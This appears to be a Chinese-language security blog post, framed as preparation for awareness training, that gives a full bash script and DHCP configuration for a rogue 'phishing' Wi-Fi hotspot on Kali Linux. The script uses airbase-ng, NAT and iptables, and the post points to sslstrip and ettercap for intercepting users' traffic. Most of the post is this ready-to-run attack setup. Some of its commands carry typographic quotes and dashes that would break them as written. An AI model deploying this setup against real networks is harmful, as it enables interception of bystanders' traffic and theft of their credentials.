Kali linux创建钓鱼wifi热点

枫少@KillBoy Web安全评论45,0203字数 1465阅读4分53秒阅读模式

最近做了一个小的安全意识培训,目的是让小伙伴们谨防不信任的Wifi热点,用到了kali linux下的一些小工具。我是用物理机安装的kali linux,然后外接了一个无线网卡wlan2。

具体的技术细节记录一下,具体的shell脚本如下:

#! /bin/bash
case $1 in
    “start”)
       sleep 1
       ifconfig wlan2 down
       sleep 1
       iwconfig wlan2 mode monitor
       sleep 1
       ifconfig wlan2 up
       sleep 2
       airmon-ng start wlan2
       sleep 1
       airbase-ng -e hellotest  -c 11 wlan2
       sleep 1
    ;;
    “atup”)
       sleep 1
       ifconfig at0 up
       sleep 1
       ifconfig at0 10.0.0.1 netmask 255.255.255.0
       sleep 1
       route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
       sleep 1
       echo “1” >/proc/sys/net/ipv4/ip_forward
       sleep 2
       dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
       sleep 2
       service isc-dhcp-server start
       sleep 1
    ;;
    “startnat”)
       sleep 1
       iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
       sleep 1
       iptables -A FORWARD -i wlan2 -o wlan0 -j ACCEPT
       sleep 1
       iptables -A FORWARD -p tcp –-syn -s 10.0.0.0/24 -j TCPMSS –set-mss 1356
       sleep 2
    ;;*)
       echo “Usage $0 {start|atup|startnat}”
    ;;
    esac

将以上shell脚本保存为cr_wifi.sh,然后依次执行:

./cr_wifi.sh start
./cr_wifi atup
./cr_wifi startnat

执行完之后就可以完成钓鱼热点的创建,其他人链接热点上网的流量都会经过at0,然后利用sslstrip,ettercap就可以进行中间人攻击的一些操作了。

以上shell脚本主要有三个部分:

1,将外接无线网卡的模式修改成监听模式,创建一个SSID为hellotest的无线热点;

2,将网络流量虚拟到at0这块网卡上;启动配置好的DHCP服务器;

3,添加iptables规则,配置NAT。

执行shell脚本之前需要现配置好dhcp服务,DHCP用的是isc-dhcp-server,需要安装一下,它的配置文件(/etc/dhcp/dhcpd.conf)如下:

ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
authoritative;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.1 10.0.0.25;
option domain-name-servers 114.114.114.114;
# option domain-name internal.example.org;
option routers 10.0.0.1;
option broadcast-address 10.0.0.250;
default-lease-time 600;
max-lease-time 7200;
}

免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
高性能云服务器2折起
 
枫少@KillBoy
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: